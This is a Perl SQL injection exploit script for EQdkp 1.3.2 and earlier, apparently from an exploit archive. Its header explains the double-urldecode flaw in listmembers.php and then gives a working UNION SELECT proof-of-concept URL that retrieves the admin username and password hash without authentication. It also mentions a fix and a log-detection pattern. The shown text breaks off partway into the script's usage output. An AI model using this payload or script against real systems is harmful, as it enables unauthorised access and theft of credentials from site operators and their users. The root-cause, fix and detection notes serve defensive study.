1 #!/usr/bin/perl −w
2
#################################################################################
#
#                    EQdkp <= 1.3.2 SQL Injection Exploit
#
# Discovered by: Silentz
# Payload: Admin Username & Hash Retrieval
# Website: http://www.w4ck1ng.com
#
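# Vulnerable Code (listmembers.php):
#
# $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment)
# AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix,
# r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS
# armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level
# FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE
# . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id =
# r.rank_id)';
#
# if ( !empty($_GET['rank']) )
# {
#     $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'";
# }
#
# Root cause: PHP has already URL-decoded $_GET['rank'], so the extra
# urldecode() decodes the value a second time and the result is concatenated
# into the query with no escaping. Any quote escaping applied to request input
# before this point (not shown here) no longer covers the decoded value.
# Fix: remove the urldecode() call and pass the rank to the database layer as
# a bound or properly escaped parameter rather than concatenating it.
#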
# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT
# 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0
# FROM eqdkp_users where user_id=1/*
#
# Detection: in web-server access logs, a request to listmembers.php whose
# rank parameter carries a doubly encoded quote (%2527) or SQL keywords such
# as UNION SELECT matches this request pattern.
#
# Subject To: Nothing, no authentication...nada!
# GoogleDork: Get your own!
#
# Shoutz: The entire w4ck1ng community
#
#################################################################################
36
37 use LWP::UserAgent;
38 if (@ARGV < 1){
39 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
40 print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
41 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
42 print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
43 print "[PATH] = Path where EQdkp is located\r\n\r\n";
44 print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
45 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
46 print "
http://www.w4ck1ng.